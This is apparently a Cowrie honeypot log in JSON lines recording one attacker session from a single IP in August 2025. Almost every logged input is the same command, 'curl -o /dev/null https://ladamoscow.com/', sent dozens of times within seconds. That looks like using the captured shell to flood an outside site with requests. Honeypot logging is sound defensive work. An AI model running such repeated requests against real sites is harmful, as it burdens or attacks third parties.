{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.588282Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.626761Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.627858Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.665975Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.666967Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.703570Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.704741Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.742183Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.743251Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.786950Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.788484Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.828898Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.830097Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.867224Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.868335Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.907202Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.908305Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.949733Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.950736Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:13.987386Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:13.988448Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.026983Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.028057Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.065535Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.066537Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.106024Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.107068Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.144025Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.145018Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.187531Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.188785Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.226209Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.227516Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.265064Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.266297Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.304450Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.305337Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.341926Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.343107Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.380634Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.381842Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.418534Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.419540Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.457152Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.458040Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.494766Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.495796Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.533067Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.534008Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.572534Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.573452Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.615013Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.615710Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.652813Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.653707Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.701602Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.702803Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.739470Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.740427Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.778739Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.779652Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.820053Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.821156Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.858236Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.859204Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.895700Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.896777Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.940178Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.941174Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:14.982545Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:14.983488Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.020162Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.021244Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.058481Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.059525Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.101972Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.103046Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.140077Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.141261Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.183570Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.184567Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.223035Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.223913Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.262404Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.263566Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.309672Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.310644Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.351318Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.352237Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.393152Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.394078Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.432261Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.433114Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.469978Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.470868Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.509948Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.510861Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.550310Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.551196Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.592412Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.593332Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.630744Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.631638Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.668649Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.669528Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.706134Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.707283Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.743745Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.744674Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.786037Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.787105Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.825892Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.827095Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.867394Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.868374Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:15.906043Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:15.907057Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.008905Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.010122Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.049775Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.050844Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.091918Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.093163Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.136631Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.137584Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.176810Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.177883Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:16.221631Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:16.222970Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
